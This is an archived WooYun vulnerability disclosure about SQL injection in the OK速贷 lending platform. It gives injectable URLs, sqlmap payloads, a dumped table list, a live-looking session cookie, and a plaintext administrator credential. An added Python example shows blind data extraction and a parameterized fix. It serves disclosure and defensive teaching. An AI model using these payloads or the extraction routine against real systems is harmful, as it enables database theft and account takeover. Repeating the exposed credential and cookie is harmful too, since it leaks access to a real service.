WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-03-30: Details reported to the vendor; awaiting vendor handling
2015-03-30: Vendor confirmed; details disclosed to the vendor only
2015-04-09: Details disclosed to core whitehats and relevant domain experts
2015-04-19: Details disclosed to regular whitehats
2015-04-29: Details disclosed to intern whitehats
2015-05-14: Details disclosed to the public

OK速贷: multiple high-risk vulnerabilities give back-office access to tens of millions in funds (leaking user funds, identity-verification information, etc.)
Injection one (the area_id parameter of the areas plugin):

GET /?plugins&q=areas&area_id=174 HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip,deflate
Cache-Control: max-age=0
Host: www1.okisbank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
DNT: 1
Connection: close
Cookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gw
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

Injection two: http://www1.okisbank.com/u/215'

Injection three: http://www1.okisbank.com/?user&q=code/borrow/loan&p=repay&type=tender&username=189

Almost every search field in the user interface is injectable, for example:
http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19
sqlmap output for injection one:

Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)
---
[12:18:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[12:18:42] [INFO] fetching tables for database: 'okisbank'
Database: okisbank
[134 tables]
deayou_account
deayou_account_balance
deayou_account_bank
deayou_account_cash
deayou_account_fee
deayou_account_fee_type
deayou_account_log
deayou_account_payment
deayou_account_recharge
deayou_account_users
deayou_account_users_bank
deayou_account_web
deayou_approve
deayou_approve_edu
deayou_approve_edu_id5
deayou_approve_id5
deayou_approve_realname
deayou_approve_sms
deayou_approve_smslog
deayou_approve_video
deayou_areas
deayou_articles
deayou_articles_pages
deayou_articles_type
deayou_attestations
deayou_attestations_type
deayou_attestations_user
deayou_borrow
deayou_borrow_activity
deayou_borrow_amount
deayou_borrow_amount_apply
deayou_borrow_amount_log
deayou_borrow_amount_type
deayou_borrow_auto
deayou_borrow_autolog
deayou_borrow_care
deayou_borrow_change
deayou_borrow_count
deayou_borrow_count_log
deayou_borrow_credit
deayou_borrow_fee
deayou_borrow_fee_log
deayou_borrow_fee_type
deayou_borrow_flag
deayou_borrow_recover
deayou_borrow_repay
deayou_borrow_roam
deayou_borrow_style
deayou_borrow_tender
deayou_borrow_tender_auto
deayou_borrow_tender_autolog
deayou_borrow_tender_web
deayou_borrow_type
deayou_borrow_verify
deayou_borrow_vouch
deayou_borrow_vouch_recover
deayou_borrow_vouch_repay
deayou_comment
deayou_comments
deayou_credit
deayou_credit_class
deayou_credit_log
deayou_credit_rank
deayou_credit_type
deayou_dw_activity_review
deayou_group
deayou_group_articles
deayou_group_comments
deayou_group_log
deayou_group_member
deayou_group_type
deayou_linkages
deayou_linkages_class
deayou_linkages_type
deayou_links
deayou_links_type
deayou_luckmember_addcount_history
deayou_luckmember_award_address
deayou_luckmember_award_history
deayou_luckmember_count
deayou_message
deayou_message_receive
deayou_modules
deayou_rating_assets
deayou_rating_company
deayou_rating_contact
deayou_rating_educations
deayou_rating_finance
deayou_rating_houses
deayou_rating_info
deayou_rating_job
deayou_remind
deayou_remind_log
deayou_remind_type
deayou_remind_user
deayou_scrollpic
deayou_scrollpic_type
deayou_site
deayou_site_menu
deayou_sms_type
deayou_spread_add
deayou_spread_log
deayou_spreads_log
deayou_spreads_set
deayou_spreads_users
deayou_system
deayou_system_auto
deayou_system_type
deayou_ucenter
deayou_ucenter_set
deayou_users
deayou_users_admin
deayou_users_admin_type
deayou_users_adminlog
deayou_users_care
deayou_users_care_user
deayou_users_email
deayou_users_email_log
deayou_users_examines
deayou_users_friends
deayou_users_friends_invite
deayou_users_friends_type
deayou_users_info
deayou_users_log
deayou_users_qq
deayou_users_rebut
deayou_users_reglog
deayou_users_sina
deayou_users_type
deayou_users_upfiles
deayou_users_vip
deayou_users_viplog
deayou_users_visit
deayou_weixin
Administrator account extracted through the injection: ok速贷ok123 (admin login at http://www1.okisbank.com/?admin)
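All four techniques sqlmap lists above (boolean-based blind, error-based, UNION, time-based) come from one defect: area_id is concatenated into the SQL string, so an attacker can extract anything the database user can read, including the administrator account named above. The following is an added example, not code from this report or from the OK速贷 application. It models the boolean-based blind case against an in-memory SQLite database and places the parameterized handler next to the vulnerable one. The column names, row contents, the constructed credential, and the assumption that the page renders differently for an empty versus a non-empty result are all made up for the example; SQLite's unicode()/substr()/length() stand in for MySQL's ASCII()/SUBSTRING()/LENGTH(), and the two table names are taken from the dumped schema.

```python
"""Added example: boolean-based blind SQL injection oracle (as sqlmap found on
area_id) against an in-memory SQLite model, next to the parameterized fix.
Constructed assumptions: column names, row contents, the credential, and that
an empty result renders differently from a non-empty one. SQLite functions
stand in for their MySQL equivalents (unicode -> ASCII, substr -> SUBSTRING)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture; the two table names come from the dumped schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE deayou_areas (area_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO deayou_areas VALUES (?, ?)",
                     [(174, "Beijing"), (175, "Shanghai")])
    conn.execute("CREATE TABLE deayou_users_admin "
                 "(id INTEGER, username TEXT, password TEXT)")
    # Constructed credential; nothing here is the real account.
    conn.execute("INSERT INTO deayou_users_admin VALUES (1, 'admin', 'not-the-real-one')")
    conn.commit()
    return conn


def areas_vulnerable(conn: sqlite3.Connection, area_id: str) -> list:
    """Models ?plugins&q=areas&area_id=...: the parameter is pasted into SQL."""
    sql = f"SELECT name FROM deayou_areas WHERE area_id = {area_id}"
    return [row[0] for row in conn.execute(sql)]


def areas_fixed(conn: sqlite3.Connection, area_id: str) -> list:
    """Hardened handler: enforce the expected type, then bind a parameter."""
    area_id_int = int(area_id)  # ValueError for '174 AND 1731=1731'
    sql = "SELECT name FROM deayou_areas WHERE area_id = ?"
    return [row[0] for row in conn.execute(sql, (area_id_int,))]


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """One blind probe: '174 AND (<condition>)' returns the row only when true,
    which is exactly what sqlmap's 'AND 1731=1731' payload tests."""
    return bool(areas_vulnerable(conn, f"174 AND ({condition})"))


def extract_blind(conn: sqlite3.Connection, expr: str, max_len: int = 64) -> str:
    """Recover a scalar SQL expression one character at a time, binary-searching
    printable ASCII through the oracle (about 8 probes per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop when the value has no character at this position.
        if not oracle(conn, f"length(({expr})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(areas_vulnerable(db, "174 AND 1731=1731"))  # row returned: true branch
    print(areas_vulnerable(db, "174 AND 1731=1732"))  # empty: false branch
    print(extract_blind(db, "(SELECT username FROM deayou_users_admin LIMIT 1)"))
    try:
        areas_fixed(db, "174 AND 1731=1731")
    except ValueError as err:
        print("rejected by fixed handler:", err)
```

The fixed handler does two things the original endpoint did not: it rejects anything that is not an integer before the query is built, and it passes the value as a bound parameter, so even a string that survived validation could never change the query's structure. Applied to every search parameter the report lists (keywords, username, dotime1, dotime2, the /u/ path segment), the same pattern closes all three injection points at once.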
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-03-30 17:28
Thanks to the author for submitting the vulnerability; we will make sure the website vulnerability is fixed and defensive mechanisms are in place.
None